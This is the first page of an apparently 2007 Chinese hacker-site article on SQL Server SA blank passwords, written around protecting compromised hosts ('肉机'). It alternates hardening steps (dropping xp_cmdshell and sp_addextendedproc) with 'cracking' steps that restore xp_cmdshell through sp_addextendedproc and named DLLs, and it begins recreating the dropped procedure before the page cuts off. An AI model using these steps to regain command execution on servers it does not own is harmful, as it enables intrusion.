SA空口令破解和保护
日期:2007年3月6日 作者:清风网络学院 查看:[大字体 中字体 小字体]-
老早就想写这篇文章了,为什么呢?因为至从在灰色轨迹看到COOLCAT的那篇《肉机保护术一》后,天天晚上就睡不着,感觉是不错,但总觉得好象有破绽,苦思苦想后,终于明白了,还是有很多破解方法和保护方法的,哈,但是最近很忙,所以不能写太多,自己好好理解吧,嗯,如果你有SQL基础的话,下面的东西,你会觉得很简单的.......
灰色上的那篇文章上的SQL语句是这样的:
if exists (select * from
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
GO
破解
先sp_helpextendedproc xp_cmdshell 看看是哪个DLL文件
再EXEC sp_addextendedproc xp_cmdshell ,@dllname ='DLL文件名'
一般SQL2000是通过下面语句恢复
EXEC sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
而SQL97是通过下面语句恢复
EXEC sp_addextendedproc xp_cmdshell ,@dllname ='xpsql70.dll'
就这么简单,哈
嗯,所以说,那个灰色上的那篇文章做的保护还是不周到。
再加保护:
DROP PROCEDURE sp_addextendedproc
if exists (select * from
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
GO
这下只sp_addextendedproc和xp_cmdshell都不能用了,哈,怎么样上面这段可是我自己写的哦,呵呵,比灰色那个安全吧
再破解
sp_addextendedproc只是个存储过程,不能再添加吗,事实上是可以的
下面是添加的语句
create procedure sp_addextendedproc --- 1996/08/30 20:13
@functname nvarchar(517),/* (owner.)name of function to call */
@dllname varchar(255)/* name of DLL containing function */ - [1] [2] [3] 下一页
-
- SA空口令破解和保护 相关文章:
- ·下载:圣诞节3D屏幕保护程序
- ·微软官网Microsoft.com安全防护趣闻
- ·保护隐私 实现网络监控的简单方法
- ·CSS让网页更容易设计与维护
- ·攻破Windows系统加密保护之EFS解密
- ·CSS让网页设计与维护
- ·无需等待 一键快速启动屏幕保护
- ·加强边界路由器安全防护的几个步骤
- ·保护好你的Wi-Fi网络
- ·用软件来加密保护电子邮件内容
- SA空口令破解和保护 相关软件
- ·装甲守护
- ·敦煌书法典藏集-佛说灌顶七万二千神王护比丘经
- ·魔兽地图:守护美女城V1.20正式版
- ·失窃的护身符
- ·保护环境随手可做的100件小事
- ·超光速守护者
- ·暗黑龙守护神
- ·电脑维护专家 1.0.4┊了解电脑的知识、维护电脑教材软件┊简体中文绿色特别版
- ·魔幻霸主(Armies of Exigo)免CD补丁及编辑器免CD补丁(本补丁只提供给正版用户作保护光盘使用,请勿用于其他用途)
- ·星际守护者4
- 特别声明:本站除部分特别声明禁止转载的专稿外的其他文章可以自由转载,但请务必注明出处和原始作
- 者.文章版权归文章原始作者所有.对于被本站转载文章的个人和网站,我们表示深深的谢意。如果本站转
- 载的文章有版权问题请联系编辑人员,我们尽快予以更正. 转载请注明来源:http://www.hackhome.com
下一篇:Mysql的常用命令
精品推荐
热点TOP10
- ·Tpvo/3783 病毒的分析和防治
- ·DLL后门清除完全篇
- ·端口大全及端口关闭方法
- ·关于IPC$空连接和IPC$入侵
- ·VBS脚本病毒原理分析与防范 (1)
- ·卡巴斯基防火墙“反黑客”的设置技巧
- ·你的端口随意开,偶就进去共享你的资料
- ·无线攻防:破解WEP密钥过程全解
- ·SYN flood攻击的原理及其防御
- ·手把手教你禁止端口
- ·解读防火墙日志记录 防范网络攻击
- ·怎么样清除能突破主动防御的新型木马
- ·网络安全专家支招防范黑客攻击九大方法
- ·封杀Windows漏洞 堵住黑客入侵途径
- ·知己知彼百战不殆 如何防范恶意网站
- ·清除威胁 网络蠕虫病毒的检测与防治
- ·网络常见木马的手工清除方法
- ·微软推出修补DirectX重大安全漏洞的补丁
- ·轻松方便 三招两式抵制IE的顽固病毒
- ·ZoneLabs防火墙的安装与设置
特别推荐
- ·解读防火墙日志记录 防范网络攻击
- ·轻松方便 三招两式抵制IE的顽固病毒
- ·怎么样清除能突破主动防御的新型木马
- ·网络安全专家支招防范黑客攻击九大方法
- ·配置防火墙和Web代理客户的访问
- ·个人计算机防范黑客的九大绝招
- ·入侵检测 浅谈安全扫描软件的检测技术
- ·教你九招防范黑客的简单办法
- ·安全专家支招防范黑客攻击九大方法
- ·如何运用包过滤技术实现个人防火墙
- ·不用防火墙手动对付SYN攻击的办法
- ·精典攻防 溢出提权攻击的解决办法
- ·安全知识 当前各种加密方案完全解析
- ·自己动手打造一道超级电脑防火墙
- ·教你打造一道超级防御力的电脑防火墙
- ·企业对付DDoS攻击 资深网管教你几大妙招
- ·四项下一代入侵检测(IDS)关键技术分析
- ·攻略:亲手安装配置DDOS硬件防火墙DIY
- ·解析个中奥妙 防火墙安装终极攻略
- ·教你如何合理高效配置防火墙
